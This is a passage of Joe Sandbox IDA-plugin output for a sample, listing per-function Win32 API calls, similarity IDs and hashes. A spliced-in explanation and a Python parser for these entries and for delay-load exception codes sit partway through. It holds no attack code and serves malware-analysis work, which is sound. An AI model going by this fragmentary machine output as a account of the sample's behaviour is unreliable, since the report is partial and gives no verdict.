                  • Opcode Fuzzy Hash: d41947c818c70625e9d807496358eec761721fb76f22e5f332217ba7c2df9579
                  • Instruction Fuzzy Hash: 11E0ED71901218EFCB10EF98D901AAAB7E8EB05321F10805BEC9993200E7B16F04AF91
                  APIs
                    • Part of subcall function 0019329A: try_get_function.LIBVCRUNTIME ref: 001932AF
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0019217A
                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00192185
                  Similarity
                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                  • String ID:
                  • API String ID: 806969131-0
                  • Opcode ID: b4322acd33906a328d189a5969fb1456a94a720534c2b10d9ae1f58c1d033e3a
                  • Instruction ID: 3f425e9cee2a9ea9a23ce2b2d24883b98ed38a41991dfa062cb595ca781a7516
                  • Opcode Fuzzy Hash: b4322acd33906a328d189a5969fb1456a94a720534c2b10d9ae1f58c1d033e3a
                  • Instruction Fuzzy Hash: 05D0A92824430234AC0827B028560A823886A62BB03E00B66F2308A0D2EF7081646112
                  APIs
                  • DloadLock.DELAYIMP ref: 0018DC73
                  • DloadProtectSection.DELAYIMP ref: 0018DC8F
                    • Part of subcall function 0018DE67: DloadObtainSection.DELAYIMP ref: 0018DE77
                  Similarity
                  • API ID: Dload$Section$LockObtainProtect
                  • String ID:
                  • API String ID: 731663317-0
                  • Opcode ID: d575284584e2716ad5a6ed35f11115bbdd484b6fd92653842ba92c5bddc44da9
                  • Instruction ID: 787f86275508e854c669bf9c3c2de2a412cc398c8ff869b50442bf1eba5376d4
                  • Opcode Fuzzy Hash: d575284584e2716ad5a6ed35f11115bbdd484b6fd92653842ba92c5bddc44da9
                  • Instruction Fuzzy Hash: 7CD0C9705153005AC616BB64B98671C33B0B718744F640686E105869E0DFA44EC1DF15
                  APIs
                  Similarity
                  • API ID: ItemShowWindow
                  • String ID:
                  • API String ID: 3351165006-0
                  • Opcode ID: 56142e9079f3508922f7a51f4300ed3a1ccce5715c656df72a0fb4dafd30173d
                  • Instruction ID: bed7dec313762c9ce7adf7b790fb73c2d372321855ce3400e1c1329f0739cb7d
                  • Opcode Fuzzy Hash: 56142e9079f3508922f7a51f4300ed3a1ccce5715c656df72a0fb4dafd30173d
                  • Instruction Fuzzy Hash: C2C0123205A201BECB010BB0DC09D2FBBA8ABA5212F05C90AF2B5C0060C238C090DB11
                  APIs
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: a6e03feaedd77a054e4772295d365c30c9d8f8b0bf78898bbc810770ff9745d9
                  • Instruction ID: db3acc4739544bd05ea95e1f97abe68290f6c1ab7e9ce9740edbe3b124187900
                  • Opcode Fuzzy Hash: a6e03feaedd77a054e4772295d365c30c9d8f8b0bf78898bbc810770ff9745d9
                  • Instruction Fuzzy Hash: 56C1A770A04254AFDF15CFACC485BA97BB5EF1A310F1880B9EC49DB386DB319944CB61
                  APIs
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 813256e6251891bc28c332d40f1d01b237b42cd9044ad3af997bffbe4c887929
                  • Instruction ID: 6607a445ee81ea2a9b4665d7c0b9cee20af454878569afd9ef29a08686a94c2e
                  • Opcode Fuzzy Hash: 813256e6251891bc28c332d40f1d01b237b42cd9044ad3af997bffbe4c887929
                  • Instruction Fuzzy Hash: 0E71AE71104F44AEDB26DB70CC51AEBB7F9AF24301F44895EE5AE47142DB326A48EF50
                  APIs
                  • __EH_prolog.LIBCMT ref: 00178384
                    • Part of subcall function 00171380: __EH_prolog.LIBCMT ref: 00171385
                    • Part of subcall function 00171380: new.LIBCMT ref: 001713FE
                    • Part of subcall function 001719A6: __EH_prolog.LIBCMT ref: 001719AB
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 9d643d363294fdc49692b8fe2b7b250d37f4917fca320c197286037987c16b2e
                  • Instruction ID: 50a33761a717995641ffabfc4c8d20d3fb4ccc37eb8b762ad0423c8c90b3c1c5
                  • Opcode Fuzzy Hash: 9d643d363294fdc49692b8fe2b7b250d37f4917fca320c197286037987c16b2e
                  • Instruction Fuzzy Hash: 2D4196719406549ADB24EB60CC59BEA73B8AF60300F0480EAE54EA7092DFB55FC9DF50
                  APIs
                  • __EH_prolog.LIBCMT ref: 00171E05
                    • Part of subcall function 00173B3D: __EH_prolog.LIBCMT ref: 00173B42
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 5df674569239e92524a3e8bf8887740d98e14f56140863170f8fb7bf8ec32810
                  • Instruction ID: 30c05743dddc57ee1fc20df5164dbe0dcd0fc67097b7310c4778508cf6ca7767
                  • Opcode Fuzzy Hash: 5df674569239e92524a3e8bf8887740d98e14f56140863170f8fb7bf8ec32810
                  • Instruction Fuzzy Hash: CF212872944208AFCF15EFA9D9519EEFBF6FF68300B10446EE849A7251CB325E10CB61
                  APIs
                  • __EH_prolog.LIBCMT ref: 0018A7C8
                    • Part of subcall function 00171380: __EH_prolog.LIBCMT ref: 00171385
                    • Part of subcall function 00171380: new.LIBCMT ref: 001713FE
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 86fe7d477c388b09f5912b3ea2843cda27dc5060cb8617ffd2dd591429021863
                  • Instruction ID: 66e6ad6a973d9f7c6a3b6fc40397dfd3ef948cab5db5084a5e5809fea8599405
                  • Opcode Fuzzy Hash: 86fe7d477c388b09f5912b3ea2843cda27dc5060cb8617ffd2dd591429021863
                  • Instruction Fuzzy Hash: 59216D71C04249ABCF14EF98C9415EEBBB4AF2A300F5044AEE809A7242D7356F06DF61
                  APIs
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 06148a1564420dbfed4efb881be6b76dc1690f2848a11eed7aa4e947bdb16181
                  • Instruction ID: a4f43cb7c00194761c3bbeeb5f5b8b8e925bf838eaf304eb4172fa18e47795e1
                  • Opcode Fuzzy Hash: 06148a1564420dbfed4efb881be6b76dc1690f2848a11eed7aa4e947bdb16181
                  • Instruction Fuzzy Hash: FB115E73A00528ABCB26AAA8CC519EEB736BF98750F058119F819B7291DB358D1487E0
                  APIs
                    • Part of subcall function 001985A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00198FD3,00000001,00000364,?,00193713,00000050,?,001B0EE8,00000200), ref: 001985EA
                  • _free.LIBCMT ref: 0019BBF6
                  Similarity
                  • API ID: AllocateHeap_free
                  • String ID:
                  • API String ID: 614378929-0
                  • Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                  • Instruction ID: 0e1c97346fbd01b0f6918867d9ad9db8f997bd8646717d7ee4d94e7b7c7be536
                  • Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                  • Instruction Fuzzy Hash: C801F9726043096BEB318F65D88595AFBE9FB95370F25052DE595832C0EB30A805C774
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00198FD3,00000001,00000364,?,00193713,00000050,?,001B0EE8,00000200), ref: 001985EA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: ca531e9c918ae4fd49649addd44b1ae1832951afb1dd84840adb59b68b3b166b
                  • Instruction ID: 1eb4d517b8778eac936e64202776c66b1363d15b4580804c3acfdf8bc65cc4c9
                  • Opcode Fuzzy Hash: ca531e9c918ae4fd49649addd44b1ae1832951afb1dd84840adb59b68b3b166b
                  • Instruction Fuzzy Hash: 46F0E931641121BBFF211E269C01B5B7788AF937B0B16C111BC18E70C1CF20DD058AE4
                  APIs
                  • __EH_prolog.LIBCMT ref: 00175BDC
                    • Part of subcall function 0017B07D: __EH_prolog.LIBCMT ref: 0017B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 9bce701019dc41ad803d6bc49f8c40f8679e07d834208578f368e4f397ae88a2
                  • Instruction ID: 2cb859edf4adb2f6d6215bab23afee881e68cbe95f143f6f20df13ec7b35f059
                  • Opcode Fuzzy Hash: 9bce701019dc41ad803d6bc49f8c40f8679e07d834208578f368e4f397ae88a2
                  • Instruction Fuzzy Hash: 92016D34A15694DAC725F7A8C0553DEF7B49F29700F40959DB89E53283CFB41B09C762
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0019C13D,00000000,?,001967E2,?,00000008,?,001989AD,?,?,?), ref: 0019854A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: bb90f05d5dfa678039f0c876c388ec669605143a52594382eed371404bd36272
                  • Instruction ID: af5524f44eda45617fad46b4b69d44b9603146b254480f63e0d4d14fb8946e7b
                  • Opcode Fuzzy Hash: bb90f05d5dfa678039f0c876c388ec669605143a52594382eed371404bd36272
                  • Instruction Fuzzy Hash: 14E0ED31645221ABFF312A69AC01B9A7B8CAF937B0F170221BC18E2080CF20CC0485F5
                  APIs
                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0017A4F5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: e08d61aab76600c38475c0fc5ac9e65348afd84cd8dd250ba1db9137ce4d0cc4
                  • Instruction ID: 660e2a8f0caf3c340f67e2c39d0b961c272a931f58e5155e4cb8771769eed7ad
                  • Opcode Fuzzy Hash: e08d61aab76600c38475c0fc5ac9e65348afd84cd8dd250ba1db9137ce4d0cc4
                  • Instruction Fuzzy Hash: 24F0E93100D380AACA221B7848047CEBBB46F6A331F44CA4DF2FD02191C3B514C59723
                  APIs
                  • SetThreadExecutionState.KERNEL32(00000001), ref: 001806B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ExecutionStateThread
                  • String ID:
                  • API String ID: 2211380416-0
                  • Opcode ID: 911882f91964a46fb554b4274cc5617ef890d9ea7fb045a27dc2158b0aa83ff1
                  • Instruction ID: 82794e530e952e1c9211b289f8c8e5e1443636244a5c164dca38a7b74a421d99
                  • Opcode Fuzzy Hash: 911882f91964a46fb554b4274cc5617ef890d9ea7fb045a27dc2158b0aa83ff1
                  • Instruction Fuzzy Hash: 9FD0C22574011036C6223324A8057FF1A1A0FDB720F080025B40D535828F4609CA4BA2
                  APIs
                  • GdipAlloc.GDIPLUS(00000010), ref: 00189D81
                    • Part of subcall function 00189B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00189B30
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Gdip$AllocBitmapCreateFromStream
                  • String ID:
                  • API String ID: 1915507550-0
                  • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction ID: f65d376759e8f26472090665094b74815c0d1c46e1b521e079e77ef8fb119680
                  • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction Fuzzy Hash: D6D0C73065420DBADF45BAB59C02A7A7BEADB10350F144175BC0886151EF71DF20AB65
                  APIs
                  • GetFileType.KERNELBASE(000000FF,00179887), ref: 00179995
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: FileType
                  • String ID:
                  • API String ID: 3081899298-0
                  • Opcode ID: b1c5480045303e98c2fff359bb28a26a182587f058c8fab1e0da68735bce1126
                  • Instruction ID: 42beb007ec5655942b36da931d3a885dd1ab50709d0aaec95711e550baf492f7
                  • Opcode Fuzzy Hash: b1c5480045303e98c2fff359bb28a26a182587f058c8fab1e0da68735bce1126
                  • Instruction Fuzzy Hash: B7D01231011141959F2146344D0919AB771DB8337EB38C6A8E129C40A1D727C947F541
                  APIs
                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0018D43F
                    • Part of subcall function 0018AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0018AC85
                    • Part of subcall function 0018AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0018AC96
                    • Part of subcall function 0018AC74: IsDialogMessageW.USER32(00010484,?), ref: 0018ACAA
                    • Part of subcall function 0018AC74: TranslateMessage.USER32(?), ref: 0018ACB8
                    • Part of subcall function 0018AC74: DispatchMessageW.USER32(?), ref: 0018ACC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                  • String ID:
                  • API String ID: 897784432-0
                  • Opcode ID: cacd66a32467111a26b65be1985ba65ace1dca1070b4215371b3f4af4c09baa0
                  • Instruction ID: 722d5d7a0cc6daba26cff8e10069ec73c0fbf8bf74cfb20fc320892d178c8e24
                  • Opcode Fuzzy Hash: cacd66a32467111a26b65be1985ba65ace1dca1070b4215371b3f4af4c09baa0
                  • Instruction Fuzzy Hash: 10D09E31144300ABD6112B51CE07F0F7AA6AB98B05F404655B348754B187729D61DB16
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: b738cde4e0e1c397ad92f69285635fbf3d0442ef338a40cd19ac5851426f7c24
                  • Instruction ID: 3a1a98993c129bedfdcf63fd31b3c3b545ad59be227b6765dedf5093a4218151
                  • Opcode Fuzzy Hash: b738cde4e0e1c397ad92f69285635fbf3d0442ef338a40cd19ac5851426f7c24
                  • Instruction Fuzzy Hash: FBB0129926C3017C310C31507D92C3B031CC6D3B11331852BF109F00C1D7405D499D31
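The function entries above are the raw output of the Joe Sandbox IDA plugin: each lists the Win32 calls a disassembled function makes directly, the calls reached through its subcalls, and a Similarity block whose API String ID lets functions of identical purpose be collapsed (the run of ___delayLoadHelper2@8 thunks below all carry 1269201914-0, and each reaches RaiseException with code C06D0057 through the same subcall at 0018DF59). The Python below is an added example, not Joe Sandbox code and not part of the report. It parses a constructed sample in this entry layout (a few lines are copied from the report), groups functions by API String ID, and decodes the RaiseException code, which has the VcppException form used by the Visual C++ delay-load helper (0xC06D0000 | Win32 error, so 0xC06D0057 carries 0x57 = 87 = ERROR_INVALID_PARAMETER). Joe Sandbox's own hashing of API IDs is not reproduced; the grouping uses the IDs exactly as printed.

```python
"""Parse Joe Sandbox per-function 'APIs' / 'Similarity' entries and summarise
which Win32 APIs each disassembled function calls.

Added example; not Joe Sandbox code and not part of the report. SAMPLE is a
constructed excerpt in the report's entry layout (some lines copied from it).
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """\
APIs
• SetThreadExecutionState.KERNEL32(00000001), ref: 001806B1
Memory Dump Source
• Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
Similarity
• API ID: ExecutionStateThread
• API String ID: 2211380416-0
• Opcode ID: 911882f91964a46fb554b4274cc5617ef890d9ea7fb045a27dc2158b0aa83ff1
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
  • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
  • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• API String ID: 1269201914-0
• Opcode ID: b738cde4e0e1c397ad92f69285635fbf3d0442ef338a40cd19ac5851426f7c24
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
  • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• API String ID: 1269201914-0
• Opcode ID: 5dc1b83312700b47eb55b3c6a2488c22ace930ab7c39a3014ffa85fb52c58be3
"""

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR" (no argument list).
CALL_RE = re.compile(
    r"(?P<name>[\w@]+)\.(?P<module>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
FACILITY_VISUALCPP = 0x6D  # facility code used by VcppException()


@dataclass
class Call:
    name: str
    module: str
    args: list[str]
    ref: int  # address of the call site, as printed in the report


@dataclass
class Entry:
    direct: list[Call] = field(default_factory=list)    # the function's own calls
    subcalls: list[Call] = field(default_factory=list)  # "Part of subcall function" lines
    api_string_id: str = ""
    opcode_id: str = ""


def parse_call(text: str) -> Optional[Call]:
    m = CALL_RE.search(text)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return Call(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))


def parse_entries(report: str) -> list[Entry]:
    """Split the report into per-function entries; 'APIs' starts a new one."""
    entries: list[Entry] = []
    section = None
    for raw in report.splitlines():
        line = raw.strip()
        if line == "APIs":
            entries.append(Entry())
            section = "apis"
            continue
        if not line.startswith("•"):
            section = None  # any other heading ends the call list
            continue
        if not entries:
            continue
        body = line.lstrip("•").strip()
        cur = entries[-1]
        if body.startswith("API String ID:"):
            cur.api_string_id = body.split(":", 1)[1].strip()
        elif body.startswith("Opcode ID:"):
            cur.opcode_id = body.split(":", 1)[1].strip()
        elif section == "apis":
            call = parse_call(body)
            if call is None:
                continue
            (cur.subcalls if body.startswith("Part of subcall function") else cur.direct).append(call)
    return entries


def group_by_api_string_id(entries: list[Entry]) -> dict[str, list[Entry]]:
    groups: dict[str, list[Entry]] = defaultdict(list)
    for e in entries:
        groups[e.api_string_id].append(e)
    return dict(groups)


def summarize(report: str) -> dict[str, int]:
    """Number of distinct functions per API String ID (identical thunks collapse)."""
    return {k: len(v) for k, v in group_by_api_string_id(parse_entries(report)).items()}


def decode_vcpp_exception(code: int) -> Optional[int]:
    """Win32 error carried by a VcppException code (sev | 0x6D << 16 | err), else None."""
    if (code >> 16) & 0x0FFF != FACILITY_VISUALCPP:
        return None
    return code & 0xFFFF


def delay_load_errors(entries: list[Entry]) -> dict[str, Optional[int]]:
    """Opcode ID -> decoded Win32 error for every function that reaches RaiseException."""
    out: dict[str, Optional[int]] = {}
    for e in entries:
        for c in e.direct + e.subcalls:
            if c.name == "RaiseException" and c.args and c.args[0] != "?":
                out[e.opcode_id] = decode_vcpp_exception(int(c.args[0], 16))
    return out


if __name__ == "__main__":
    for sid, n in summarize(SAMPLE).items():
        print(f"API String ID {sid}: {n} function(s)")
    for opc, err in delay_load_errors(parse_entries(SAMPLE)).items():
        print(f"{opc[:16]}... RaiseException -> Win32 error {err}")
```

Run over the full report text, the grouping shows at a glance how much of the function list is delay-load boilerplate versus functions with their own API surface (SetThreadExecutionState, FindClose, GetFileType, the GDI+ and dialog message loop calls), which is where manual review time is better spent.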
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 5dc1b83312700b47eb55b3c6a2488c22ace930ab7c39a3014ffa85fb52c58be3
                  • Instruction ID: 7bb599416bfaa23754460df4f70172e001a4906ff04da343eddc5f94e81d8139
                  • Opcode Fuzzy Hash: 5dc1b83312700b47eb55b3c6a2488c22ace930ab7c39a3014ffa85fb52c58be3
                  • Instruction Fuzzy Hash: A9B0129526C2017C310C71547D42D36032CC6D3B10330C01BF509E02C1D7406D0A1E31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
